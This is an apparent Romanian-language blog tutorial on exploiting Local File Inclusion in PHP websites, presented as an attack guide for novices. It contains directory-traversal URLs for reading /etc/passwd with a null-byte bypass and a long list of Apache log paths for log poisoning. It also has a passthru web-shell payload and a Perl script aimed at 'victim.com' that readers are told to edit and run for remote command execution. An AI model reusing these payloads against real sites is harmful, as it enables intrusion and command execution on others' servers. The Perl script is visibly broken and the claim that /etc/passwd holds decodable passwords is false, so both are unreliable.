Buna ziua! In acest tutorial o sa invatati cum cum sa exploatati vulnerabilitatea LFI dintr-un site.
Mai intai, sa vedem acest mic cod php:
| Cod: |
| <?php $page = $_GET[page]; include($page); ?> |
Acesta este un cod care nu ar trebui folosit niciodata, vulnerabil la LFI, pentru ca variabila $page nu este santinizata.
Ok, acum sa profitam de aceasta vulnerabilitate, folosind urmatorul cod:
| Cod: |
| site.host/index.php?page=../../../../../../../etc/passwd |
Daca siteul este gazduit Unix, parolele userilor sunt stocate in /etc/passwd si codul de mai sus ne arata aceste parole si usernameurile. Acum tot ce mai ai de facut este sa decodezi parola.
O parola criptata, ar trebui sa arate cam asa:
| Cod: |
| username:x:503:100:FullName:/home/username:/bin/sh |
In acest exemplu, parola este x, alt exemplu de parola fiind:
| Cod: |
| username:!:503:100:FullName:/home/username:/bin/sh |
Alte “locuri” unde puteti gasi parolele in afara de /etc/passwd ar cam fi:
| Cod: |
| /etc/shadow /etc/group /etc/security/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/security/limits |
In caz ca Browserul va arata la sfarsitul includerii un .php (si automat. /etc/passwd.php nu va mai exista), adaugati la sf includerii %00, serverul va omite tot ce scrie dupa %00.
Exemplu de cod:
| Cod: |
| site.host/index.php?file=../../../../../../../../etc/passwd%00 |
Acum vom incerca sa rulam comenzi pe server injectand coduri php in loguri, apoi rulandu-le.
Cateva adrese de loguri:
| Cod: |
| ../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../../../../etc/httpd/logs/acces_log ../../../../../../../etc/httpd/logs/acces.log ../../../../../../../etc/httpd/logs/error_log ../../../../../../../etc/httpd/logs/error.log ../../../../../../../var/www/logs/access_log ../../../../../../../var/www/logs/access.log ../../../../../../../usr/local/apache/logs/access_log ../../../../../../../usr/local/apache/logs/access.log ../../../../../../../var/log/apache/access_log ../../../../../../../var/log/apache2/access_log ../../../../../../../var/log/apache/access.log ../../../../../../../var/log/apache2/access.log ../../../../../../../var/log/access_log ../../../../../../../var/log/access.log ../../../../../../../var/www/logs/error_log ../../../../../../../var/www/logs/error.log ../../../../../../../usr/local/apache/logs/error_log ../../../../../../../usr/local/apache/logs/error.log ../../../../../../../var/log/apache/error_log ../../../../../../../var/log/apache2/error_log ../../../../../../../var/log/apache/error.log ../../../../../../../var/log/apache2/error.log ../../../../../../../var/log/error_log ../../../../../../../var/log/error.log |
Ok, acum sa aruncam o privire asupra logului in care se salveaza paginile care nu exista si urmatorul cod: <? passthru(\$_GET[cmd]) ?>. Daca scriem in browser:
| Cod: |
| site.host/<? passthru(\$_GET[cmd]) ?> |
O sa ne arate evident o pagina in care scrie ca acest cod nu exista pe server, deoarece browserul encodeaza automat URL’ul si pagina pe care noi am accesat-o, browserul o traduce in:
| Cod: |
| site.host/%3C?%20passthru(\$_GET[cmd])%20?> |
Deci va trebui sa facem altceva… Putem utiliza urmatorul script perl:
| Cod: |
| #!/usr/bin/perl -w use IO::Socket; use LWP::UserAgent; $site=”victim.com”; $path=”/folder/”; $code=”<? passthru(\$_GET[cmd]) ?>”; $log = “../../../../../../../etc/httpd/logs/error_log”;print “Trying to inject the code”; $socket = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80″) or die “\nConnection Failed.\n\n”; print “\nType command to run or exit to end: “; while($cmd !~ “exit”) { $socket = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80″) or die “\nConnection Failed.\n\n”; while ($show = <$socket>) print “Type command to run or exit to end: “; |
Copy/Paste la chestia asta si salveaz-o ca ex.pl, dar nu uita sa modifici in exploit urmatoarele lucruri:
1) modifica numele siteului
2) modifica numele logului si calea catre el
3) schimba index.php= cu ce doresti tu
Rulati scriptul si el va va intreba ce comenzi sa rulati !!! Va descurcati de aici incolo !!!
Linkuri utile:
| Cod: |
| http://www.milw0rm.com/video/watch.php?id=57 |
Acesta este un mic tutorial video, incercati sa-l vizionati ca este foarte bun.
Proof of Concept:
[img]
http://img355.imageshack.us/my.php?image=sitewe2.jpg
[/img]
Traducerea si adaptarea+modificari: vladiii
Filed under: Uncategorized | Tagged: file, inclusion, informatica, lfi, local, n00b, vladii
